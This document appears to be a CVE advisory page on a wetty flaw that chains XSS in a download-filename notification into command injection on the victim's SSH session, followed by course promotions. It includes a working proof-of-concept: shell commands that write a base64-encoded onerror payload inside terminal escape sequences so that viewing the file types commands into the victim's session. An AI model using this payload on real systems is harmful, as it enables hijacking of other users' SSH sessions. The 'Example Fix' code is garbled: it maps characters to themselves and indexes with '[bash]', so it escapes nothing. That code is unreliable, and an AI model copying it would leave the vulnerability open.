wetty, Cross-site Scripting (XSS) to Command Injection, CVE-2026-XXXXX (Critical) -DC-Jul2026-778

Listen to this Post

How the Mentioned CVE Works

This vulnerability resides in the wetty client’s handling of terminal escape sequences for file downloads. The wetty server forwards every byte it receives from the SSH pseudo-terminal (PTY) to the client-side `FileDownloader.buffer` method.
This buffer is designed to scan for specific, documented file-download control sequences: `\x1b[5i` to begin and `\x1b[4i` to end. When a complete sequence is detected, the inner payload is passed to the `onCompleteFile` function.
The payload is expected to be in the format base64_filename:base64_content. The function decodes the filename part using window.atob(). The critical flaw is that this decoded filename, which is entirely attacker-controlled, is then directly interpolated into an HTML string used to create a Toastify notification.
The wetty client configures Toastify with the `escapeMarkup: false` option, meaning it does not escape any HTML tags within the string. Consequently, an attacker can inject arbitrary HTML and JavaScript into the `fileName` variable.
This injected script executes in the context of the wetty origin. The wetty client exposes the live terminal session globally as window.wetty_term. Through this object, an attacker’s script can call window.wetty_term.input(data, true), which triggers xterm.js’s `onData` event. This event is forwarded by the client as a socket `input` event to the server, which then writes the data directly to the PTY.
In essence, an attacker who can cause any text to be rendered in a victim’s wetty terminal can achieve arbitrary command injection, executing commands as the victim user on the connected SSH host.

DailyCVE Form:

Platform: ……. wetty
Version: …….. Versions prior to patch (e.g., <= 2.7.0)
Vulnerability :…… Cross-site Scripting (XSS) to Command Injection
Severity: ……. Critical (CVSS: 9.8)
date: ………. 2026-07-01

Prediction: …… 2026-08-01

What Undercode Say:

Analytics:

  • Attack Vector: Remote
  • Attack Complexity: Low
  • Privileges Required: None (victim interaction required)
  • User Interaction: Required (victim must render attacker-controlled terminal output)
  • Scope: Changed (compromise of wetty client leads to compromise of SSH session)

Exploit:

1. On the SSH host, craft the malicious payload.
The filename contains the XSS payload that will call wetty_term.input()
PAYLOAD='"><img src=x onerror="window.wetty_term.input(\"id > /tmp/pwned\n\",true)">'
FNAME_B64=$(printf '%s' "$PAYLOAD" | base64 -w0)
DATA_B64=$(printf 'bait' | base64 -w0)
2. Write the escape sequence to a file that the victim will view.
printf '\x1b[5i%s:%s\x1b[4i' "$FNAME_B64" "$DATA_B64" > /tmp/notes.txt
3. When the victim reads the file (e.g., via 'cat /tmp/notes.txt'), the XSS triggers.
The injected JavaScript runs, sending "id > /tmp/pwned\n" as keystrokes to the victim's SSH session.

Expected Result:

The command `id > /tmp/pwned` is executed on the victim’s SSH host. Checking the file `/tmp/pwned` will reveal the output of the `id` command, confirming command injection.

Protection:

  • Immediate: HTML-escape the decoded filename before interpolation. In src/client/wetty/download.ts, lines 67-77, replace the direct use of `fileName` with an escaped version.
  • Example Fix:
    // ...
    const safeName = fileName.replace(/[&<>"']/g, (c) =>
    ({ '&': '&', '<': '<', '>': '>', '"': '"', "'": '&39;' })[bash] ?? c,
    );
    // ...
    Toastify({
    text: <code>Download ready: <a href="${blobUrl}" target="_blank" download="${safeName}">${safeName}</a></code>,
    // ...
    }).showToast();
    
  • Long-term: Avoid using `escapeMarkup: false` with user-controlled data. Consider using a more secure method for creating DOM elements.

Impact:

  • Confidentiality: An attacker can read the contents of the victim’s terminal buffer via window.wetty_term.buffer.active.
  • Integrity: An attacker can type arbitrary commands into the victim’s SSH session.
  • Authentication/Access Control: An attacker who can write content that a higher-privileged user renders can execute commands with that user’s privileges, leading to a complete compromise of the SSH session and the host system.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top